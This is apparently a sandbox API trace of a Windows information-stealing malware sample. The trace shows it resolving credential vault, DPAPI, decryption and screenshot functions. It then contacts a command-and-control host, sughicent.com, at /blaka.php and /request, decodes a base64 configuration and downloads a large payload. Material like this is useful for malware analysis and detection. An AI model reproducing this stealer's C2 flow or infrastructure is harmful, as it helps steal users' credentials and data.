[0212.026] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6d620000 [0212.714] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x77240000 [0212.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x756e0000 [0221.307] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x6cbb0000 [0222.270] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x74720000 [0225.134] LoadLibraryA (lpLibFileName="dbghelp.dll") returned 0x6ca70000 [0225.796] GetProcAddress (hModule=0x77720000, lpProcName="sscanf") returned 0x7779d950 [0225.796] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x7779cfe0 [0225.796] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x7779c940 [0225.796] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetOpenA") returned 0x6e1785d0 [0225.796] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetConnectA") returned 0x6e1f0da0 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="HttpOpenRequestA") returned 0x6e215860 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="HttpSendRequestA") returned 0x6e178e60 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="HttpQueryInfoA") returned 0x6e151880 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetCloseHandle") returned 0x6e17d200 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetReadFile") returned 0x6e137320 [0225.797] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetSetOptionA") returned 0x6e151dc0 [0225.798] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetOpenUrlA") returned 0x6e0fa6c0 [0225.798] GetProcAddress (hModule=0x6e0b0000, lpProcName="InternetCrackUrlA") returned 0x6e18f730 [0225.798] GetProcAddress (hModule=0x77450000, lpProcName="wsprintfA") returned 0x774804a0 [0225.798] GetProcAddress (hModule=0x77450000, lpProcName="CharToOemW") returned 0x774d2d90 [0225.798] GetProcAddress (hModule=0x77450000, lpProcName="GetKeyboardLayoutList") returned 0x77488e70 [0225.798] GetProcAddress (hModule=0x77450000, lpProcName="EnumDisplayDevicesA") returned 0x743d1eb0 [0225.798] GetProcAddress (hModule=0x77450000, lpProcName="ReleaseDC") returned 0x743ca580 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="GetDC") returned 0x743ca680 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="GetSystemMetrics") returned 0x77469160 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="GetDesktopWindow") returned 0x77463470 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="GetWindowRect") returned 0x77464140 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="GetWindowDC") returned 0x743d18c0 [0225.799] GetProcAddress (hModule=0x77450000, lpProcName="CloseWindow") returned 0x774abb50 [0225.799] GetProcAddress (hModule=0x74650000, lpProcName="RegOpenKeyExA") returned 0x7466f790 [0225.800] GetProcAddress (hModule=0x74650000, lpProcName="RegQueryValueExA") returned 0x7466f500 [0225.800] GetProcAddress (hModule=0x74650000, lpProcName="RegCloseKey") returned 0x7466f620 [0225.800] GetProcAddress (hModule=0x74650000, lpProcName="GetCurrentHwProfileA") returned 0x74683a60 [0225.800] GetProcAddress (hModule=0x74650000, lpProcName="RegEnumKeyExA") returned 0x74671810 [0225.800] GetProcAddress (hModule=0x74650000, lpProcName="RegGetValueA") returned 0x74671060 [0225.800] GetProcAddress (hModule=0x76b30000, lpProcName="CreateDCA") returned 0x743d1e00 [0225.800] GetProcAddress (hModule=0x76b30000, lpProcName="GetDeviceCaps") returned 0x743d0700 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="CreateCompatibleDC") returned 0x743d0970 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="CreateCompatibleBitmap") returned 0x743d0830 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="SelectObject") returned 0x76bb0440 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="BitBlt") returned 0x743d09b0 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="DeleteObject") returned 0x76bb0810 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="StretchBlt") returned 0x76bdf810 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="GetObjectW") returned 0x76bb22e0 [0225.801] GetProcAddress (hModule=0x76b30000, lpProcName="GetDIBits") returned 0x76bb1580 [0225.802] GetProcAddress (hModule=0x76b30000, lpProcName="SaveDC") returned 0x76be6070 [0225.802] GetProcAddress (hModule=0x76b30000, lpProcName="CreateDIBSection") returned 0x743d0ac0 [0225.802] GetProcAddress (hModule=0x76b30000, lpProcName="DeleteDC") returned 0x76bb0d00 [0225.802] GetProcAddress (hModule=0x76b30000, lpProcName="RestoreDC") returned 0x76be5db0 [0225.802] GetProcAddress (hModule=0x74ed0000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x6d491730 [0225.989] GetProcAddress (hModule=0x74990000, lpProcName="GetModuleFileNameExA") returned 0x74991660 [0225.989] GetProcAddress (hModule=0x775a0000, lpProcName="CryptUnprotectData") returned 0x775c3140 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x740f3c50 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptDestroyKey") returned 0x740f6420 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x740f3760 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptSetProperty") returned 0x740f47e0 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptGenerateSymmetricKey") returned 0x740f4910 [0225.990] GetProcAddress (hModule=0x740f0000, lpProcName="BCryptDecrypt") returned 0x740f4ff0 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultOpenVault") returned 0x6d62bc10 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultCloseVault") returned 0x6d62bc90 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultEnumerateItems") returned 0x6d62b960 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultGetItemWin8") returned 0x0 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultGetItemWin7") returned 0x0 [0225.991] GetProcAddress (hModule=0x6d620000, lpProcName="VaultFree") returned 0x6d637050 [0225.991] GetProcAddress (hModule=0x77240000, lpProcName="StrCmpCA") returned 0x77263330 [0225.992] GetProcAddress (hModule=0x77240000, lpProcName="StrStrA") returned 0x77263570 [0225.992] GetProcAddress (hModule=0x77240000, lpProcName="PathMatchSpecA") returned 0x77262c20 [0225.992] GetProcAddress (hModule=0x756e0000, lpProcName="SHGetFolderPathA") returned 0x75899b10 [0225.992] GetProcAddress (hModule=0x756e0000, lpProcName="ShellExecuteExA") returned 0x75950290 [0225.993] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipGetImageEncodersSize") returned 0x6cc0f520 [0225.993] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipGetImageEncoders") returned 0x6cc0f380 [0225.993] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x6cbf5b70 [0225.993] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdiplusStartup") returned 0x6cc1ab50 [0225.993] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdiplusShutdown") returned 0x6cc1a7c0 [0225.994] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipSaveImageToStream") returned 0x6cc14bd0 [0225.994] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipDisposeImage") returned 0x6cc191c0 [0225.994] GetProcAddress (hModule=0x6cbb0000, lpProcName="GdipFree") returned 0x6cbf3810 [0225.994] GetProcAddress (hModule=0x74720000, lpProcName="CreateStreamOnHGlobal") returned 0x77341370 [0225.997] GetProcAddress (hModule=0x74720000, lpProcName="GetHGlobalFromStream") returned 0x77341a60 [0225.997] GetProcAddress (hModule=0x6ca70000, lpProcName="SymMatchString") returned 0x6cb52890 [0226.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401020, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0226.015] GetSystemTime (in: lpSystemTime=0x19fe28 | out: lpSystemTime=0x19fe28*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x3, wMinute=0x30, wSecond=0x1a, wMilliseconds=0x3bc)) [0226.015] lstrcatA (in: lpString1="", lpString2="10/04/2022 20:00:00" | out: lpString1="10/04/2022 20:00:00") returned="10/04/2022 20:00:00" [0226.015] SystemTimeToFileTime (in: lpSystemTime=0x19fe28, lpFileTime=0x19ff40 | out: lpFileTime=0x19ff40) returned 1 [0226.016] SystemTimeToFileTime (in: lpSystemTime=0x19fe18, lpFileTime=0x19ff48 | out: lpFileTime=0x19ff48) returned 1 [0226.020] GetProcessHeap () returned 0x6b0000 [0226.020] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4098) returned 0x6cf7e0 [0226.124] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6400000, lpName=0x0) returned 0x1c8 [0226.126] MapViewOfFile (hFileMappingObject=0x1c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6400000) returned 0x20c0000 [0226.132] GetProcessHeap () returned 0x6b0000 [0226.132] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x8) returned 0x6c6ea8 [0226.132] GetSystemTime (in: lpSystemTime=0x1986bc | out: lpSystemTime=0x1986bc*(wYear=0x7e6, wMonth=0x3, wDayOfWeek=0x3, wDay=0x17, wHour=0x3, wMinute=0x30, wSecond=0x1b, wMilliseconds=0x48)) [0226.132] lstrcatA (in: lpString1="", lpString2="ASR1DBSJMYMYM7" | out: lpString1="ASR1DBSJMYMYM7") returned="ASR1DBSJMYMYM7" [0226.132] lstrcatA (in: lpString1="ASR1DBSJMYMYM7", lpString2=".zip" | out: lpString1="ASR1DBSJMYMYM7.zip") returned="ASR1DBSJMYMYM7.zip" [0226.132] lstrcatA (in: lpString1="", lpString2="http://" | out: lpString1="http://") returned="http://" [0226.132] lstrcatA (in: lpString1="http://", lpString2="sughicent.com" | out: lpString1="http://sughicent.com") returned="http://sughicent.com" [0226.132] lstrcatA (in: lpString1="http://sughicent.com", lpString2="/request" | out: lpString1="http://sughicent.com/request") returned="http://sughicent.com/request" [0226.136] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0229.049] StrCmpCA (pszStr1="http://", pszStr2="https://") returned -57 [0229.049] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x192504*, dwBufferLength=0x4) returned 1 [0229.050] InternetConnectA (hInternet=0xcc0004, lpszServerName="sughicent.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0229.052] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/blaka.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400100, dwContext=0x0) returned 0xcc000c [0229.054] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0232.197] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x192508, lpdwBufferLength=0x19260c, lpdwIndex=0x0 | out: lpBuffer=0x192508*, lpdwBufferLength=0x19260c*=0x3, lpdwIndex=0x0) returned 1 [0232.197] StrCmpCA (pszStr1="200", pszStr2="200") returned 0 [0232.197] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x191d28, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x191d20 | out: lpBuffer=0x191d28*, lpdwNumberOfBytesRead=0x191d20*=0x1c) returned 1 [0232.197] lstrcatA (in: lpString1="", lpString2="MXwxfDF8MXwxfDVxRGxQdVZLb1J8" | out: lpString1="MXwxfDF8MXwxfDVxRGxQdVZLb1J8") returned="MXwxfDF8MXwxfDVxRGxQdVZLb1J8" [0232.198] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x191d28, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x191d20 | out: lpBuffer=0x191d28*, lpdwNumberOfBytesRead=0x191d20*=0x0) returned 1 [0232.199] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0232.200] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0232.200] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0232.200] CryptStringToBinaryA (in: pszString="MXwxfDF8MXwxfDVxRGxQdVZLb1J8", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x191d10, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x191d10, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0232.200] CryptStringToBinaryA (in: pszString="MXwxfDF8MXwxfDVxRGxQdVZLb1J8", cchString=0x1c, dwFlags=0x1, pbBinary=0x18ceec, pcbBinary=0x191d10, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x18ceec, pcbBinary=0x191d10, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0232.200] lstrcatA (in: lpString1="", lpString2="1|1|1|1|1|5qDlPuVKoR|" | out: lpString1="1|1|1|1|1|5qDlPuVKoR|") returned="1|1|1|1|1|5qDlPuVKoR|" [0232.200] lstrcatA (in: lpString1="", lpString2="1|1|1|1|1|5qDlPuVKoR|" | out: lpString1="1|1|1|1|1|5qDlPuVKoR|") returned="1|1|1|1|1|5qDlPuVKoR|" [0232.200] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0232.200] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0232.200] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0232.200] StrCmpCA (pszStr1="1", pszStr2="1") returned 0 [0232.200] StrCmpCA (pszStr1="1", pszStr2="0") returned 1 [0232.200] lstrcatA (in: lpString1="", lpString2="5qDlPuVKoR" | out: lpString1="5qDlPuVKoR") returned="5qDlPuVKoR" [0232.200] lstrcatA (in: lpString1="5qDlPuVKoR", lpString2=".txt" | out: lpString1="5qDlPuVKoR.txt") returned="5qDlPuVKoR.txt" [0232.200] GetProcessHeap () returned 0x6b0000 [0232.200] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5f5e0ff) returned 0x8f7e020 [0232.599] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0232.600] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x1987cc*, dwBufferLength=0x4) returned 1 [0232.600] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://sughicent.com/request", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x4000100, dwContext=0x0) returned 0xcc000c [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.771] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 